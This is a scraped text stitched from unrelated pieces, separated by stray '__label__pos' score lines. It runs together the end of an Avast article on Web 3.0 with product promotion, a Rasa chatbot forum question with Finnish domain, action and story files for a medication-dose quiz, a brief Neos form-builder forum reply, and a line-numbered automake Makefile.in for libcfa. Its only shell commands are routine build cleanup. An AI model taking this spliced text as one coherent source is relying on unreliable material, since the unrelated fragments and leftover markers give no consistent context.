<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
aria-expanded="false">dropdown 3<span
class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">1</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
aria-expanded="false">dropdown 4<span
class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">1</a></li>
<li><a href="#">2</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
aria-expanded="false">dropdown 5<span
class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">1</a></li>
<li><a href="#">2</a></li>
</ul>
</li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
aria-expanded="false">dropdown 6<span
class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">1</a></li>
<li><a href="#">2</a></li>
<li><a href="#">3</a></li>
</ul>
</li>
</ul>
</div><!-- /.navbar-collapse -->
</div><!-- /.container-fluid -->
</nav>
CSS:
body {
font-family: "Lato","Helvetica Neue",Helvetica,Arial,sans-serif;
font-size: 15px;
color: #2c3e50;
height: 100%;
}
html {
height: 100%;
}
@media screen and (max-width: 768px) {
.navbar {
position: relative;
min-height: 40px;
margin-bottom: 20px;
border: 1px solid transparent;
}
.navbar-default .navbar-nav .open .dropdown-menu > li > a {
color: #fff;
}
.navbar-default .navbar-nav .open .dropdown-menu > li > a:hover {
color: #18bc9c;
}
}
@media screen and (min-width: 768px) {
.dropdown:hover .dropdown-menu {
display: block;
}
.navbar {
position: relative;
min-height: 40px;
margin-bottom: 65px;
border: 1px solid transparent;
}
.panel {
border-radius: 6px;
}
}
.navbar-default .navbar-toggle:focus, .navbar-default .navbar-toggle:hover {
background-color: #1a242f;
-webkit-transform: rotate(360deg);
-moz-transition: rotate(360deg);
transform: rotate(360deg);
}
.navbar-brand {
font-size: 25px;
padding-right: 30px;
}
a {
text-decoration: underline;
}
.nav>li>a {
padding-right: 25px;
text-decoration: none;
}
.navbar-default .navbar-brand {
color: #fff;
text-decoration: none;
}
.dropdown-menu>li>a {
text-decoration: none;
}
.navbar-default .navbar-nav>li>a {
color: #fff;
}
.navbar-default {
background-color: #2c3e50;
}
.navbar-default .navbar-brand:focus, .navbar-default .navbar-brand:hover {
color: #18bc9c;
}
.navbar-default .navbar-nav>li>a:hover, .navbar-default .navbar-nav>li>a:focus {
color: #18bc9c;
}
.navbar-default .navbar-nav>.open>a, .navbar-default .navbar-nav>.open>a:hover, .navbar-default .navbar-nav>.open>a:focus {
color: #fff;
background-color: #1a242f;
}
.navbar-default .navbar-nav>.active>a, .navbar-default .navbar-nav>.active>a:focus, .navbar-default .navbar-nav>.active>a:hover {
color: white;
background-color: #1a242f;
}
.navbar-fixed-bottom .navbar-collapse, .navbar-fixed-top .navbar-collapse {
max-height: 400px;
}
.navbar-fixed-bottom .navbar-collapse, .navbar-fixed-top .navbar-collapse {
max-height: 400px;
}
Try it out at: http://codepen.io/anon/pen/LbEOya
Answer Source
You can also remove the padding from other elements evenly as well .
Code pen : http://codepen.io/saa93/pen/vyEWaO
Code:
@media only screen and (min-width:768px) and (max-width: 992px) {
.navbar .container{
width:100%;
}
.nav.navbar-nav > li > a {
padding-right: 8px;
}
a.navbar-brand{
padding-right:20px;
}
}
|
__label__pos
| 0.971124 |
sync(); } /** * Process all sync actions. */ function sync() { $this->sync_downloads(); $this->sync_ratings(); $this->update_tested_up_to(); } /** * Sync any changed download counts to plugin meta. */ function sync_downloads() { global $wpdb; $download_count_table = PLUGINS_TABLE_PREFIX . 'download_counts'; $changed_download_counts = $wpdb->get_results( "SELECT p.id as post_id, downloads FROM `{$wpdb->posts}` p JOIN `{$download_count_table}` c on p.post_name = c.plugin_slug LEFT JOIN `{$wpdb->postmeta}` pm ON p.id = pm.post_id AND pm.meta_key = 'downloads' WHERE downloads != pm.meta_value OR pm.meta_id IS NULL" ); foreach ( $changed_download_counts as $row ) { update_post_meta( $row->post_id, 'downloads', $row->downloads ); } } /** * Sync new/updated ratings to postmeta. */ function sync_ratings() { global $wpdb; if ( ! class_exists( '\WPORG_Ratings' ) ) { return; } // Sync new (and updated) ratings to postmeta $last_review_time = get_option( 'plugin_last_review_sync' ); $current_review_time = $wpdb->get_var( 'SELECT MAX(`date`) FROM `ratings`' ); if ( strtotime( $last_review_time ) >= strtotime( $current_review_time ) ) { return; } // Get the plugin slugs for whom extra reviews have been made, or ratings changed. $slugs = $wpdb->get_col( $wpdb->prepare( "SELECT distinct object_slug FROM `ratings` WHERE object_type = 'plugin' AND `date` >= %s AND `date` < %s", $last_review_time, $current_review_time ) ); foreach ( $slugs as $plugin_slug ) { $post = Plugin_Directory::get_plugin_post( $plugin_slug ); if ( ! $post ) { continue; } update_post_meta( $post->ID, 'rating', \WPORG_Ratings::get_avg_rating( 'plugin', $post->post_name ) ); update_post_meta( $post->ID, 'ratings', \WPORG_Ratings::get_rating_counts( 'plugin', $post->post_name ) ); } update_option( 'plugin_last_review_sync', $current_review_time, 'no' ); } /** * After WordPress is released, update the 'tested' meta keys to the latest version as * specified by `wporg_get_version_equivalents()`. */ function update_tested_up_to() { global $wpdb; if ( ! function_exists( 'wporg_get_version_equivalents' ) ) { return; } $equivs = wporg_get_version_equivalents(); $equivs_key = md5( serialize( $equivs ) ); if ( $equivs_key === get_option( 'plugin_last_tested_sync' ) ) { return; } $latest_equiv = array(); foreach ( $equivs as $latest_compatible_version => $compatible_with ) { foreach ( $compatible_with as $version ) { $latest_equiv[ $version ] = $latest_compatible_version; } } $tested_meta_value_esc_sql = '"' . implode( '", "', array_map( 'esc_sql', array_keys( $latest_equiv ) ) ) . '"'; $tested_values = $wpdb->get_results( "SELECT post_id, meta_value FROM {$wpdb->postmeta} WHERE meta_key = 'tested' AND meta_value IN( {$tested_meta_value_esc_sql} )" ); foreach ( $tested_values as $row ) { update_post_meta( $row->post_id, 'tested', $latest_equiv[ $row->meta_value ] ); } update_option( 'plugin_last_tested_sync', $equivs_key ); } }
|
__label__pos
| 0.994491 |
AWS CloudFormation
User Guide (API Version 2010-05-15)
« PreviousNext »
View the PDF for this guide.Go to the AWS Discussion Forum for this product.Go to the Kindle Store to download this guide in Kindle format.Did this page help you? Yes | No | Tell us about it...
Get Started
With the right template, you can deploy at once all the AWS resources you need for an application. In this section, you'll examine a template that declares the resources for a WordPress blog, creates a WordPress blog as a stack, monitors the stack creation process, examines the resources on the stack, and then deletes the stack. You use the AWS Management Console to complete these tasks.
Step 1: Sign up for the Service
Signing up for AWS CloudFormation also automatically signs you up for other AWS products you need, such as Amazon Elastic Compute Cloud, Amazon Relational Database Service and Amazon Simple Notification Service. You're not charged for any services unless you use them.
Note
AWS CloudFormation is a free service; however, you are charged for the AWS resources you include in your stacks at the current rates for each. For more information about AWS pricing, go to the detail page for each product on http://aws.amazon.com.
To sign up for AWS CloudFormation
1. Go to http://aws.amazon.com/cloudformation, and then click Sign Up for AWS CloudFormation.
2. Follow the on-screen instructions.
If you don't already have an AWS account, you'll be prompted to create one when you sign up for AWS CloudFormation.
Part of the sign-up procedure involves receiving a phone call and entering a PIN using the phone keypad.
Step 2: Pick a template
Next, you'll need a template that specifies the resources that you want in your stack. For this step, you use a sample template that is already prepared. The sample template creates a basic WordPress blog that uses a single Amazon EC2 instance and an Amazon RDS DB Instance. The template also creates an Amazon EC2 and Amazon RDS security group to control firewall settings for the Amazon EC2 instance and the database instance.
Important
AWS CloudFormation is free, but the AWS resources that AWS CloudFormation creates are live (and not running in a sandbox). You will incur the standard usage fees for these resources until you terminate them in the last task in this tutorial. The total charges will be minimal. For information about how you might minimize any charges, go to http://aws.amazon.com/free/.
To view the template
A template is a JavaScript Object Notation (JSON) text file that contains the configuration information about the AWS resources you want to create in the stack. In this particular sample template, it includes six top-level sections: AWSTemplateFormatVersion, Description, Parameters, Mappings, Resources, and Outputs; however, only the Resources section is required.
The Resources section contains the definitions of the AWS resources you want to create with the template. Each resource is listed separately and specifies the properties that are necessary for creating that particular resource. The following resource declaration is the configuration for the Amazon RDS database instance, which in this example has the logical name DBInstance:
"Resources" : {
...
"DBInstance" : {
"Type": "AWS::RDS::DBInstance",
"Properties": {
"DBName" : { "Ref" : "DBName" },
"Engine" : "MySQL",
"MasterUsername" : { "Ref" : "DBUsername" },
"DBInstanceClass" : { "Ref" : "DBClass" },
"DBSecurityGroups" : [{ "Ref" : "DBSecurityGroup" }],
"AllocatedStorage" : { "Ref" : "DBAllocatedStorage" },
"MasterUserPassword": { "Ref" : "DBPassword" }
}
},
"DBSecurityGroup": {
"Type": "AWS::RDS::DBSecurityGroup",
"Properties": {
"DBSecurityGroupIngress": { "EC2SecurityGroupName": { "Ref": "WebServerSecurityGroup"} },
"GroupDescription" : "Frontend Access"
}
},
...
},
If you have created database instances before, you can recognize properties, such as Engine, DBInstanceClass, and AllocatedStorage, that determine the configuration of the database instance. Resource declarations are an efficient way to specify all these configuration settings at once. When you put resource declarations in a template, you can create and configure all the declared resources easily by using the template to create a stack. To launch the same configuration of resources, all you have to do is create a new stack that uses the same template.
The resource declaration begins with a string that specifies the logical name for the resource. As you'll see, the logical name can be used to refer to resources within the template.
You use the Parameters section to declare values that can be passed to the template when you create the stack. A parameter is an effective way to specify sensitive information, such as user names and passwords, that you don't want to store in the template itself. It is also a way to specify information that might be unique to the specific application or configuration you are deploying, for example, a domain name or instance type. When you create the WordPress stack later in this section, you'll see the set of parameters declared in the template appear on the Specify Parameters page of the Create Stack wizard, where you can specify the parameters before you create the stack.
The following parameters are used in the template to specify values that are used in properties of the Amazon RDS database instance resource:
"Parameters" : {
...
"DBName" : {
"Default": "wordpress",
"Description" : "The WordPress database name",
"Type": "String",
"MinLength": "1",
"MaxLength": "64",
"AllowedPattern" : "[a-zA-Z][a-zA-Z0-9]*",
"ConstraintDescription" : "must begin with a letter and contain only alphanumeric characters."
},
"DBUsername" : {
"Default": "admin",
"NoEcho": "true",
"Description" : "The WordPress database admin account user name",
"Type": "String",
"MinLength": "1",
"MaxLength": "16",
"AllowedPattern" : "[a-zA-Z][a-zA-Z0-9]*",
"ConstraintDescription" : "must begin with a letter and contain only alphanumeric characters."
},
"DBPassword" : {
"Default": "admin",
"NoEcho": "true",
"Description" : "The WordPress database admin account password",
"Type": "String",
"MinLength": "1",
"MaxLength": "41",
"AllowedPattern" : "[a-zA-Z0-9]*",
"ConstraintDescription" : "must contain only alphanumeric characters."
},
"DBAllocatedStorage" : {
"Default": "5",
"Description" : "The size of the database (Gb)",
"Type": "Number",
"MinValue": "5",
"MaxValue": "1024",
"ConstraintDescription" : "must be between 5 and 1024Gb."
},
...
},
In the DBInstance resource declaration, you see the DBName property specified with the DBName parameter:
"DBInstance" : {
"Type": "AWS::RDS::DBInstance",
"Properties": {
"DBName" : { "Ref" : "DBName" },
...
}
},
The braces contain a call to the Ref function with DBName as its input. The Ref function returns the value of the object it refers to. In this case, the Ref function sets the DBName property to the value that was specified for DBName when the stack was created.
The Ref function can also set a resource's property to the value of another resource. For example, the resource declaration DBInstance contains the following property declaration:
"DBInstance" : {
"Type": "AWS::RDS::DBInstance",
"Properties": {
...
"DBSecurityGroups" : [{ "Ref" : "DBSecurityGroup" }],
...
}
},
The DBSecurityGroups property takes a list of Amazon RDS database security groups. The Ref function has an input of DBSecurityGroup, which is the logical name of a database security group in the template, and adds the name of DBSecurityGroup to the DBSecurityGroups property.
In the template, you'll also find a Mappings section. You use mappings to declare conditional values that are evaluated in a similar manner as a lookup table statement. The template uses mappings to select the correct Amazon machine image (AMI) for the region and the architecture type for the instance type. Outputs define custom values that are returned by the aws cloudformation describe-stacks command and in the AWS CloudFormation console Outputs tab after the stack is created. You can use output values to return information from the resources in the stack, such as the URL for a website that was created in the template. We cover mappings, outputs, and other things about templates in more detail in Learn Template Basics.
That's enough about templates for now. Let's start creating a stack.
Step 3: Make sure you have prepared any required items for the stack
Before you create a stack from a template, you must ensure that all dependent resources that the template requires are available. A template can use or refer to both existing AWS resources and resources declared in the template itself. AWS CloudFormation takes care of checking references to resources in the template and also checks references to existing resources to ensure that they exist in the region where you are creating the stack. If your template refers to a dependent resource that does not exist, stack creation fails.
The example WordPress template contains an input parameter, KeyName, that specifies the key pair used for the Amazon EC2 instance that is declared in the template. The template depends on the user who creates a stack from the template to supply a valid Amazon EC2 key pair for the KeyName parameter. If you supply a valid key pair name, the stack creates successfully. If you don't supply a valid key pair name, the stack is rolled back.
Make sure you have a valid Amazon EC2 key pair and record the key pair name before you create the stack.
To see your key pairs, open the Amazon EC2 console, then click Key Pairs in the navigation pane.
Note
If you don't have an Amazon EC2 key pair, you must create the key pair in the same region where you are creating the stack. For information about creating a key pair, see Getting an SSH Key Pair in the Amazon Elastic Compute Cloud User Guide.
Now that you have a valid key pair, let's use the WordPress template to create a stack.
Step 4: Create the stack
You will create your stack based on the WordPress-1.0.0 file discussed earlier. The template contains several AWS resources including an Amazon RDS database instance and an Amazon EC2 instance.
To create the WordPress stack
1. Sign in to the AWS Management Console and open the AWS CloudFormation console at https://console.aws.amazon.com/cloudformation/.
2. If this is a new AWS CloudFormation account, click Create New Stack. Otherwise, click Create Stack.
3. In the Stack Name field, type a stack name. For this example, use MyWPTestStack. The stack name cannot contain spaces.
4. Select Provide an S3 URL to template to type or paste the URL for the sample WordPress template, and then click Continue:
https://s3.amazonaws.com/cloudformation-templates-us-east-1/WordPress_Single_Instance_With_RDS.template
Note
AWS CloudFormation templates that are stored in an Amazon S3 bucket must be accessible to the user who is creating the stack, and must exist in the same region as the stack being created. Therefore, if the Amazon S3 bucket exists in the us-east-1 region, the stack must also be created in us-east-1.
5. In the KeyName field, enter the name of a valid Amazon EC2 key pair in the same region you are creating the stack.
Note
On the Specify Parameters page, you'll recognize the parameters from the Parameters section of the template.
6. Click Next Step.
7. In this scenario, we won't add any tags. Click Next. Tags, which are key-value pairs, can help you identify your stacks. For more information, see Adding Tags to Your AWS CloudFormation Stack.
8. Review the information for the stack. When you're satisfied with the settings, click Create.
Your stack might take several minutes to create—but you probably don't want to just sit around waiting. If you're like us, you'll want to know how the stack creation is going.
Step 5: Monitor the progress of stack creation
After you complete the Create Stack wizard, AWS CloudFormation begins creating the resources that are specified in the template. Your new stack, MyWPTestStack, appears in the list at the top portion of the CloudFormation console. Its status should be CREATE_IN_PROGRESS. You can see detailed status for a stack by viewing its events.
To view the events for the stack
1. On the AWS CloudFormation console, select the stack MyWPTestStack in the list.
2. In the stack details pane, click the Events tab.
The console automatically refreshes the event list with the most recent events every 60 seconds.
The Events tab displays each major step in the creation of the stack sorted by the time of each event, with latest events on top.
The first event (at the bottom of the event list) is the start of the stack creation process:
2013-04-24 18:54 UTC-7 CREATE_IN_PROGRESS AWS::CloudFormation::Stack MyWPTestStack User initiated
Next are events that mark the beginning and completion of the creation of each resource. For example, creation of the DBSecurityGroup security group results in the following entries:
2013-04-24 18:59 UTC-7 CREATE_COMPLETE AWS::RDS::DBSecurityGroup...
2013-04-24 18:54 UTC-7 CREATE_IN_PROGRESS AWS::RDS::DBSecurityGroup...
The CREATE_IN_PROGRESS event is logged when AWS CloudFormation reports that it has begun to create the resource. The CREATE_COMPLETE event is logged when the resource is successfully created.
When AWS CloudFormation has successfully created the stack, you will see the following event at the top of the Events tab:
2013-04-24 19:17 UTC-7 CREATE_COMPLETE AWS::CloudFormation::Stack MyWPTestStack
If AWS CloudFormation cannot create a resource, it reports a CREATE_FAILED event and, by default, rolls back the stack and deletes any resources that have been created. The Reason column displays the issue that caused the failure. For example, if you specified an invalid database password, you might see something like the following event for the AWS::RDS::DBInstance resource:
2013-04-24 19:21 UTC-7 CREATE_FAILED AWS::RDS::DBInstance DBInstance The parameter MasterUserPassword is not a valid password because it is shorter than 8 characters.
Step 6: Use your stack resources
When the stack MyWPTestStack has a status of CREATE_COMPLETE, AWS CloudFormation has finished creating the stack, and you can start using its resources.
The sample WordPress stack creates a WordPress website. You can continue with the WordPress setup by running the WordPress installation script.
To complete the WordPress installation
1. On the Outputs tab, in the WebsiteURL row, click the link in the Value column.
The WebsiteURL output value is the URL of the installation script for the WordPress website that you created with the stack.
2. On the web page for the WordPress installation, follow the on-screen instructions to complete the WordPress installation. For more information about installing WordPress, see http://codex.wordpress.org/Installing_WordPress.
After you complete the installation and log in, you are directed to the dashboard where you can set additional options for your WordPress blog. Then, you can start writing posts for your blog that you successfully created by using a AWS CloudFormation template.
Step 8: Clean Up
You have completed the AWS CloudFormation getting started tasks. To make sure you are not charged for any unwanted services, you can clean up by deleting the stack and its resources.
To delete the stack and its resources
1. From the AWS CloudFormation console, select the MyWPTestStack stack.
2. Click Delete Stack.
3. In the confirmation message that appears, click Yes, Delete.
The status for MyWPTestStack changes to DELETE_IN_PROGRESS. In the same way you monitored the creation of the stack, you can monitor its deletion by using the Event tab. When AWS CloudFormation completes the deletion of the stack, it removes the stack from the list.
Congratulations! You successfully picked a template, created a stack, viewed and used its resources, and deleted the stack and its resources. Not only that, you were able to set up a WordPress blog using a AWS CloudFormation template. You can find other templates in the AWS CloudFormation Sample Template Library.
Now it's time to learn more about templates so that you can easily modify existing templates or create your own: Learn Template Basics.
|
__label__pos
| 0.860102 |
В программе знак «:=» означает оператор присваивания, знаки «+», «-«, «*» и «/» — соответственно операции сложения, вычитания, умножения и деления. Правила выполнения операций и порядок действий соответствуют правилам арифметики.
Определите значение переменной a после выполнения алгоритма:
a := 8
b := 3
b := a / 2 * b
a := 3 * a + 2 * b
Решение
Это простейшая вычислительная задача, которая требует немного внимания. Рассмотрим ее построчно.
В первой строке в переменную a положили число 8.
Во второй строке в переменную b — число 3
В третьей строке значение переменной b меняется на новое. Давайте его рассчитаем:
b := a / 2 * b = 8 / 2 * 3 = 4 * 3 = 12
Теперь в переменной b хранится не 3, а 12.
В четвертой строке переписывается значение переменной a. Подставив вместо a и b их значения, получим:
a := 3 * 8 + 2 * 12 = 24 + 23 = 48
Ответ: 48
|
__label__pos
| 0.825201 |
Карандаш и циркуль в раздумии мем на парте нарисованный грузовик ручкой мем овсянка картмэн негодует надпись на парте
Похоже, вы используете блокировщик рекламы. Наш сайт существует и развивается только за счет дохода от рекламы.
Пожалуйста, добавьте нас в исключения блокировщика.
Список уроков
Скрыть меню
На главную страницу На главную страницу
Войти при помощи
Войти на сайт через ВКонтакте
Темы уроков
Начальная школа
Математика 5 класс
Математика 6 класс
Алгебра 7 класс
Геометрия 7 класс
Алгебра 8 класс
Алгебра 9 класс
Алгебра 10 класс
Алгебра 11 класс
Теоретически между теорией и практикой разницы практически нет. Но практика показывает, что она есть. Йоги Бера
На главную страницу На главную страницу на главную
Квадратичная функция. Парабола
лупа Скрепки
Найти репетиторапортфель Поддержать сайтспасибо
Прежде чем перейти к разбору квадратичной функции рекомендуем вспомнить, что называют функцией в математике.
Если вы прочно закрепите общие знания о функции (способы задания, понятие графика) дальнейшее изучение других видов функций будет даваться значительно легче.
Что называют квадратичной функцией
Запомните! !
Квадратичная функция — это функция вида
y = ax2 + bx + c,
где a, b и с — заданные числа.
Другими словами можно сказать, что если в функции старшая (то есть самая большая) степень, в которой стоит «x» — это «2», то перед нами квадратичная функция.
Рассмотрим примеры квадратичных функций и определим, чему в них равны коэффициенты «a», «b» и «с».
Квадратичная функция Коэффициенты
y = 2x2 − 7x + 9
• a = 2
• b = −7
• с = 9
y = 3x2 − 1
• a = 3
• b = 0
• с = −1
y = −3x2 + 2x
• a = −3
• b = 2
• с = 0
Как построить график квадратичной функции
Запомните! !
График квадратичной функции называют параболой.
Парабола выглядит следующим образом.
парабола - график квадратичной функции
Также парабола может быть перевернутой.
перевернутая парабола
Существует четкий алгоритм действий при построении графика квадратичной функции. Рекомендуем при построении параболы всегда следовать этому порядку действий, тогда вы сможете избежать ошибок при построении.
Чтобы было проще понять этот алгоритм, сразу разберем его на примере.
Построим график квадратичной функции «y = x2 −7x + 10».
1. Направление ветвей параболы
Запомните! !
Если «a > 0», то ветви направлены вверх. парабола маленькая
Если «a < 0», то ветви направлены вниз. перевернутая парабола маленькая
В нашей функции «a = 1», это означает, что ветви параболы направлены вверх. перевернутая парабола мальнькая
2. Координаты вершины параболы
Запомните! !
Чтобы найти «x0» (координата вершины по оси «Ox») нужно использовать формулу:
x0 =
−b
2a
Найдем «x0» для нашей функции «y = x2 −7x + 10».
x0 =
− (−7)
2 · 1
=
7
2
= 3,5
Теперь нам нужно найти «y0» (координату вершины по оси «Oy»). Для этого нужно подставить найденное значение «x0» в исходную функцию. Вспомнить, как найти значение функции можно в уроке «Как решать задачи на функцию» в подразделе «Как получить значение функции».
y0(3,5) = (3,5)2 − 7 ·3,5 + 10 = 12,25 − 24,5 + 10 = −12,25 + 10 = −2,25
Выпишем полученные координаты вершины параболы.
(·) A (3,5; −2,25) — вершина параболы.
Отметим вершину параболы на системе координат. Проведем через отмеченную точку ось симметрии, так как парабола — это симметричный график относительно оси «Oy».
вершина параболы
3. Нули функции
Для начала давайте разберемся, что называют нулями функции.
Запомните! !
Нули функции — это точки пересечения графика функции с осью «Ox» (осью абсцисс).
Наглядно нули функции на графике выглядят так:
нули функции
Свое название нули функции получили из-за того, что у этих точек координата по оси «Oy» равна нулю.
Теперь давайте разберемся, как до построения графика функции рассчитать координаты точек нулей функции.
Запомните! !
Чтобы найти координаты точек нулей функции, нужно в исходную функцию подставить вместо «y = 0».
Подставим в заданную функцию «y = x2 −7x + 10» вместо «y = 0» и решим полученное квадратное уравнение относительно «x» .
0 = x2 −7x + 10
x2 −7x + 10 = 0
x1;2 =
7 ± √49 − 4 · 1 · 10
2 · 1
x1;2 =
7 ± √9
2
x1;2 =
7 ± 3
2
x1 =
7+ 3
2
x2 =
7 3
2
x1 =
10
2
x2 =
4
2
x1 = 5 x2 = 2
Мы получили два корня в уравнении, значит, у нас две точки пересечения с осью «Ox». Назовем эти точки и выпишем их координаты.
• (·) B (5; 0)
• (·) C (2; 0)
Отметим полученные точки («нули функции») на системе координат.
отмечаем нули функции на системе координат
4. Дополнительные точки для построения графика
Возьмем четыре произвольные числовые значения для «x». Целесообразно брать целые числовые значения на оси «Ox», которые наиболее близки к оси симметрии. Числа запишем в таблицу в порядке возрастания.
x 1 3 4 6
y
Для каждого выбранного значения «x» рассчитаем «y».
• y(1) = 12 − 7 · 1 + 10 = 1 − 7 + 10 = 4
• y(3) = 32 − 7 · 3 + 10 = 9 − 21 + 10 = −2
• y(4) = 42 − 7 · 4 + 10 = 16 − 28 + 10 = −2
• y(6) = 62 − 7 · 6 + 10 = 36 − 42 + 10 = 4
Запишем полученные результаты в таблицу.
x 1 3 4 6
y 4 −2 −2 4
Отметим полученные точки графика на системе координат (зеленые точки).
дополнительные точки для построения
Теперь мы готовы построить график. На забудьте после построения подписать график функции.
график параболы
Краткий пример построения параболы
Рассмотрим другой пример построения графика квадратичной функции. Только теперь запишем алгоритм построения коротко без подробностей.
Пусть требуется построить график функции «y = −3x2 − 6x − 4».
1. Направление ветвей параболы
2. «a = −3» — ветви параболы направлены вниз. перевернутая парабола маленькая
3. Координаты вершины параболы
x0 =
−b
2a
x0 =
−(−6)
2 · (−3)
=
6
−6
= −1
y0(−1) = (−3) · (−1)2 − 6 · (−1) − 4 = −3 · 1 + 6 − 4 = −1
(·) A (−1; −1)
— вершина параболы.
вершина параболы -3x^2 - 6x - 4
4. Нули функции
Точки пересечения с осью «Ox» (y = 0).
0 = −3x2 − 6x − 4
−3x2 − 6x − 4 = 0 |·(−1)
3x2 + 6x + 4 = 0
x1;2 =
−6 ± √62 − 4 · 3 · 4
2 · 1
x1;2 =
−6 ± √36 − 48
2
x1;2 =
−6 ± √−12
2
Ответ: нет действительных корней.
Так как корней нет, значит, график функции не пересекает ось «Ox».
5. Вспомогательные точки для: «x = −3»; «x = −2»; «x = 0»; «x = 1». Подставим в исходную функцию «y = −3x2 − 6x − 4».
• y(−3) = −3 · (−3)2 − 6 · (−3) − 4 = −3 · 9 + 18 − 4 = −27 + 14 = −13
• y(−2) = −3 · (−2)2 − 6 · (−2) − 4 = −3 · 4 + 12 − 4 = −12 + 12 − 4 = −4
• y(0) = −3 · 02 − 6 · 0 − 4 = −4
• y(1) = −3 · 12 − 6 · 1 − 4 = −3 −6 − 4 = −13
x −3 −2 0 1
y −13 −4 −4 −13
Отметим вспомогательные точки. Отмечаем на системе координат только те точки, которые не выходят за масштаб нашей системы координат, то есть точки «(−2; −4)» и «(0; −4)». Построим и подпишем график функции.
график функции -3x^2 - 6x - 4
|
__label__pos
| 0.860749 |
Quick Answer: Is Your Browsing History Really Deleted?
What happens when you clear your browsing history?
Browsing history: Clearing your browsing history deletes the following: Web addresses you’ve visited are removed from the History page.
Shortcuts to those pages are removed from the New Tab page.
Address bar predictions for those websites are no longer shown..
Can Internet providers see incognito history?
Unfortunately, private browsing mode won’t help you there, contrary to what many internet users think. … While incognito mode doesn’t store your browsing history, temporary files, or cookies from session to session, it can’t shield you from everything. Your internet service provider (ISP) can see your activity.
Can anyone see my Google search history?
Google Search History You might not know it, but every time you use Google to perform an online search. … Although an individual person would have to know the password information for your Google account to access it. Google maintains a history of your queries and must allow access to it if a court order is obtained.
Can police recover deleted search history?
Keeping Your Data Secure So, can police recover deleted pictures, texts, and files from a phone? The answer is yes—by using special tools, they can find data that hasn’t been overwritten yet. However, by using encryption methods, you can ensure your data is kept private, even after deletion.
Can my parents see my incognito history?
Your parents cannot see what you did in incognito, (unless you forgot to close the tab or just left it open),, because incognito doesn’t have history. However, whatever you do on internet, the data goes to your internet service provider.
How do I permanently delete my phone history?
Delete all activityOn your Android phone or tablet, open your device’s Settings app Google. Manage your Google Account.At the top, tap Data & personalization.Under “Activity and timeline,” tap My Activity.To the right of the search bar, tap More. Delete activity by.Below “Delete Activity,” tap All time.Tap Delete.
How do I permanently delete my history on my iPhone?
Clear the history and cookies from Safari on your iPhone, iPad, or iPod touchTo clear your history and cookies, go to Settings > Safari, and tap Clear History and Website Data. … To clear your cookies and keep your history, go to Settings > Safari > Advanced > Website Data, then tap Remove All Website Data.More items…•
Can browsing history be deleted permanently?
If you don’t want a record of webpages you’ve visited using Chrome, you can delete all or some of your browsing history. If you delete your browsing history, it’ll take effect on all devices where you’ve turned sync on and signed in to Chrome. Your history will be removed from Chrome.
Can anyone see your deleted history?
Even though the folder is gone from the direct view of unwanted people, but the documents still exist and can easily be found with a bit of extra effort. In technical terms, your deleted browsing history can be recovered by unauthorized parties, even after you cleared them.
Can deleted history be recovered?
The easiest method is to do a system restore. If the internet history was deleted recently system restore will recover it. To get system restore up and running you can go to the ‘start’ menu and do a search for system restore which will take you to the feature.
Can you track incognito browsing?
If you sign in to any website in Incognito mode, that site will know that you’re the one browsing and can keep track of your activities from that moment on. Prevent your activity or location from being visible to the websites you visit, your school, employer, or your Internet Service provider.
|
__label__pos
| 0.999636 |
SHARE
Programming for Greatest number of 3
Explanation:
Here we will be seeing a number which is greater than other 2 . Take 3 variable, compare each variable with other two. If it satisfies the condition that block will be executed.
code:
#include <stdio.h>
#include <conio.h>
void main()
{
int a,b,c;
printf(“\n Enter 3 Numbers:”);
scanf(“%d%d%d”,&a,&b,&c);
if(a>b && a>c)
{
printf(“%d is greatest”,a);
}
else if(b>a && b>c)
{
printf(“%d is greatest”,b);
}
else
{
printf(“%d is greatest”,c);
}
getch();
}
Output:
Enter 3 Numbers:12
54
32
54 is greatest
LEAVE A REPLY
Please enter your comment!
Please enter your name here
|
__label__pos
| 0.988968 |
diff mbox series
[RFC,06/13] ASoC: qcom: audioreach: add module configuration command helpers
Message ID [email protected] (mailing list archive)
State New, archived
Headers show
Series ASoC: qcom: Add AudioReach support | expand
Commit Message
Srinivas Kandagatla June 7, 2021, 3:28 p.m. UTC
Audioreach module configuration helpers, which will be used by the q6apm-dai driver.
Signed-off-by: Srinivas Kandagatla <[email protected]>
---
sound/soc/qcom/audioreach/audioreach.c | 551 +++++++++++++++++++++++++
sound/soc/qcom/audioreach/audioreach.h | 16 +
sound/soc/qcom/audioreach/q6apm.c | 265 ++++++++++++
3 files changed, 832 insertions(+)
diff mbox series
Patch
diff --git a/sound/soc/qcom/audioreach/audioreach.c b/sound/soc/qcom/audioreach/audioreach.c
index 7291adb37d49..eecea02f93bd 100644
--- a/sound/soc/qcom/audioreach/audioreach.c
+++ b/sound/soc/qcom/audioreach/audioreach.c
@@ -529,3 +529,554 @@ void *audioreach_alloc_graph_pkt(struct q6apm *apm,
return pkt;
}
+int audioreach_graph_send_cmd_sync(struct q6apm_graph *graph,
+ struct gpr_pkt *pkt,
+ uint32_t rsp_opcode)
+{
+
+ struct device *dev = graph->dev;
+ struct gpr_hdr *hdr = &pkt->hdr;
+ int rc;
+
+ mutex_lock(&graph->cmd_lock);
+ graph->result.opcode = 0;
+ graph->result.status = 0;
+
+ rc = gpr_send_port_pkt(graph->port, pkt);
+ if (rc < 0)
+ goto err;
+
+ if (rsp_opcode)
+ rc = wait_event_timeout(graph->cmd_wait,
+ (graph->result.opcode == hdr->opcode) ||
+ (graph->result.opcode == rsp_opcode),
+ 5 * HZ);
+ else
+ rc = wait_event_timeout(graph->cmd_wait,
+ (graph->result.opcode == hdr->opcode),
+ 5 * HZ);
+
+ if (!rc) {
+ dev_err(dev, "CMD timeout for [%x] opcode\n", hdr->opcode);
+ rc = -ETIMEDOUT;
+ } else if (graph->result.status > 0) {
+ dev_err(dev, "DSP returned error[%x] %x\n", hdr->opcode,
+ graph->result.status);
+ rc = -EINVAL;
+ } else {
+ dev_err(dev, "DSP returned [%x]\n", graph->result.status);
+ rc = 0;
+ }
+
+err:
